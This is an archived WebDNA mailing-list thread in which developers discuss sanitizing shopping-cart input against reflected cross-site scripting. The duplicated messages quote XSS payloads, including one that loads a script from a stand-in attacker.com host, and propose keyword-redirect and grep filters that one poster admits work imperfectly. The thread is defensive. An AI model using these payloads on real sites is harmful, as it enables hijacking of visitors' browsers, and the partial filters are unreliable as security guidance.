Matthew A Perosi JewelerWebsites.com------------------------------by Psi Prime-------Senior Web Developer 323 Union Blvd. Totowa, NJ 07512Pre-Sales: 888.872.0274Service: 973.413.8213Training: 973.413.8214Fax: 973.413.8217http://www.jewelerwebsites.comhttp://en.wikipedia.org/wiki/Psi_Prime%2C_Inchttp://www.psiprime.com
Thanks Matthew,--------------040503080005070306090204-- Associated Messages, from the most recent to the oldest:
So, do you place this code on every page, i.e. in a headerinclude file?
-Jeff
On Apr 13, 2009, at 1:48 PM, Psi Prime, Matthew A Perosi wrote:
I use the index.html page sometimes, and theerror.html page other times.
If they are hacking I prefer to just send them to a real page than acustom 404 page. It's probably a bot anyway, but if it's a real personI don't want them to have the satisfaction of knowing they aresuccessful in any way.
According to HackerSafe (now McAfee) the <script> and<iframe> attacks are the most common. So I filter and redirectthose quickly and any other attempted hacks are nullified.
Now that I look at this again I see that the [cart] could probably begrepped for characters, leaving only numbers. But the simple test of>18 works, but not perfectly... in that I sometimes see cart filesin the ShoppingCarts directory that have character names.
Matthew A Perosi JewelerWebsites.com------------------------------by Psi Prime-------Senior Web Developer 323 Union Blvd. Totowa, NJ 07512Pre-Sales: 888.872.0274Service: 973.413.8213Training: 973.413.8214Fax: 973.413.8217http://www.jewelerwebsites.comhttp://en.wikipedia.org/wiki/Psi_Prime%2C_Inchttp://www.psiprime.com
Jeffrey Jones wrote:Hi Matthew,Any specific reason you redirect to the index page?
-Jeff
On Apr 13, 2009, at 12:35 PM, Psi Prime, Matthew A Perosiwrote:
This seems to work for me.
It seems to stand up to the attacks from McAfee Secure
[formvariables]
[showif [url][name][/url]^script>][redirect /index.html][/showif]
[showif [url][name][/url]^iframe][redirect /index.html][/showif]
[text][url][name][/url]=[input][value][/input][/text]
[/formvariables]
[showif [countchars][cart][/countchars]>18][redirect/index.html][/showif]
Matthew A Perosi JewelerWebsites.com------------------------------by Psi Prime-------Senior Web Developer 323 Union Blvd. Totowa, NJ 07512Pre-Sales: 888.872.0274Service: 973.413.8213Training: 973.413.8214Fax: 973.413.8217http://www.jewelerwebsites.comhttp://en.wikipedia.org/wiki/Psi_Prime%2C_Inchttp://www.psiprime.com
Marc Thompson wrote:You are correct Willian NEVER trust user input.What I always do is simply remove any characters I don't recognize using grep. All user input is "cleaned" before taking any action on itwhatsoever.For [cart] values:[GetChars start=1&end=20][Grepsearch=[^0-9]&replace=][value][/Grep][/GetChars]For other text values:[GetChars start=1&end=100][Grep search=[^,-.%@_A-Za-z0-9ÜüÄäÖö]&replace=][value][/Grep][/GetChars]MarcWilliam DeVaul wrote:I have no idea about a server level fix. This goes to never trustinguser input. I thought it should always be surrounded by [raw] and[url] to prevent this.What do others do?BillOn Mon, Apr 13, 2009 at 2:08 PM, Bob Minor <bob@cybermill.com> wrote:What are people doing for the following type of attacks?http://www.example.com/shoppingcart.tpl?cart="<script>alert123</script>"I assume you could just do a [removehtml][cart][/removehtml]I know you can do something like that at the code level but is theresomething that can be done at the server level or does the new versioncicadae have built in protections?More info on the attackhttp://www.example.com/?var=<SCRIPT%20a=">"%20SRC="http://www.attacker.com/xss.js"></SCRIPT>This will exploit the reflected cross site scripting vulnerability shownbefore, executing the javascript code stored on the attacker's web server asif it was originating from the victim web site, www.example.com.A complete test will include instantiating a variable with several attackvectors (Check Fuzz vectors appendix and Encoded injection appendix).Finally, analyzing answers can get complex. A simple way to do this is touse code that pops up a dialog, as in our example. This typically indicatesthat an attacker could execute arbitrary JavaScript of his choice in thevisitors' browsers.---------------------------------------------------------This message is sent to you because you are subscribed tothe mailing list <talk@webdna.us>.To unsubscribe, E-mail to: <talk-leave@webdna.us>archives: http://mail.webdna.us/list/talk@webdna.usold archives: http://dev.webdna.us/TalkListArchive/.
|
Matthew A Perosi JewelerWebsites.com------------------------------by Psi Prime-------Senior Web Developer 323 Union Blvd. Totowa, NJ 07512Pre-Sales: 888.872.0274Service: 973.413.8213Training: 973.413.8214Fax: 973.413.8217http://www.jewelerwebsites.comhttp://en.wikipedia.org/wiki/Psi_Prime%2C_Inchttp://www.psiprime.com
Thanks Matthew,--------------040503080005070306090204-- "Psi Prime, Matthew A Perosi "
So, do you place this code on every page, i.e. in a headerinclude file?
-Jeff
On Apr 13, 2009, at 1:48 PM, Psi Prime, Matthew A Perosi wrote:
I use the index.html page sometimes, and theerror.html page other times.
If they are hacking I prefer to just send them to a real page than acustom 404 page. It's probably a bot anyway, but if it's a real personI don't want them to have the satisfaction of knowing they aresuccessful in any way.
According to HackerSafe (now McAfee) the <script> and<iframe> attacks are the most common. So I filter and redirectthose quickly and any other attempted hacks are nullified.
Now that I look at this again I see that the [cart] could probably begrepped for characters, leaving only numbers. But the simple test of>18 works, but not perfectly... in that I sometimes see cart filesin the ShoppingCarts directory that have character names.
Matthew A Perosi JewelerWebsites.com------------------------------by Psi Prime-------Senior Web Developer 323 Union Blvd. Totowa, NJ 07512Pre-Sales: 888.872.0274Service: 973.413.8213Training: 973.413.8214Fax: 973.413.8217http://www.jewelerwebsites.comhttp://en.wikipedia.org/wiki/Psi_Prime%2C_Inchttp://www.psiprime.com
Jeffrey Jones wrote:Hi Matthew,Any specific reason you redirect to the index page?
-Jeff
On Apr 13, 2009, at 12:35 PM, Psi Prime, Matthew A Perosiwrote:
This seems to work for me.
It seems to stand up to the attacks from McAfee Secure
[formvariables]
[showif [url][name][/url]^script>][redirect /index.html][/showif]
[showif [url][name][/url]^iframe][redirect /index.html][/showif]
[text][url][name][/url]=[input][value][/input][/text]
[/formvariables]
[showif [countchars][cart][/countchars]>18][redirect/index.html][/showif]
Matthew A Perosi JewelerWebsites.com------------------------------by Psi Prime-------Senior Web Developer 323 Union Blvd. Totowa, NJ 07512Pre-Sales: 888.872.0274Service: 973.413.8213Training: 973.413.8214Fax: 973.413.8217http://www.jewelerwebsites.comhttp://en.wikipedia.org/wiki/Psi_Prime%2C_Inchttp://www.psiprime.com
Marc Thompson wrote:You are correct Willian NEVER trust user input.What I always do is simply remove any characters I don't recognize using grep. All user input is "cleaned" before taking any action on itwhatsoever.For [cart] values:[GetChars start=1&end=20][Grepsearch=[^0-9]&replace=][value][/Grep][/GetChars]For other text values:[GetChars start=1&end=100][Grep search=[^,-.%@_A-Za-z0-9ÜüÄäÖö]&replace=][value][/Grep][/GetChars]MarcWilliam DeVaul wrote:I have no idea about a server level fix. This goes to never trustinguser input. I thought it should always be surrounded by [raw] and[url] to prevent this.What do others do?BillOn Mon, Apr 13, 2009 at 2:08 PM, Bob Minor <bob@cybermill.com> wrote:What are people doing for the following type of attacks?http://www.example.com/shoppingcart.tpl?cart="<script>alert123</script>"I assume you could just do a [removehtml][cart][/removehtml]I know you can do something like that at the code level but is theresomething that can be done at the server level or does the new versioncicadae have built in protections?More info on the attackhttp://www.example.com/?var=<SCRIPT%20a=">"%20SRC="http://www.attacker.com/xss.js"></SCRIPT>This will exploit the reflected cross site scripting vulnerability shownbefore, executing the javascript code stored on the attacker's web server asif it was originating from the victim web site, www.example.com.A complete test will include instantiating a variable with several attackvectors (Check Fuzz vectors appendix and Encoded injection appendix).Finally, analyzing answers can get complex. A simple way to do this is touse code that pops up a dialog, as in our example. This typically indicatesthat an attacker could execute arbitrary JavaScript of his choice in thevisitors' browsers.---------------------------------------------------------This message is sent to you because you are subscribed tothe mailing list <talk@webdna.us>.To unsubscribe, E-mail to: <talk-leave@webdna.us>archives: http://mail.webdna.us/list/talk@webdna.usold archives: http://dev.webdna.us/TalkListArchive/.
DOWNLOAD WEBDNA NOW!
The WebDNA community talk-list is the best place to get some help: several hundred extremely proficient programmers with an excellent knowledge of WebDNA and an excellent spirit will deliver all the tips and tricks you can imagine...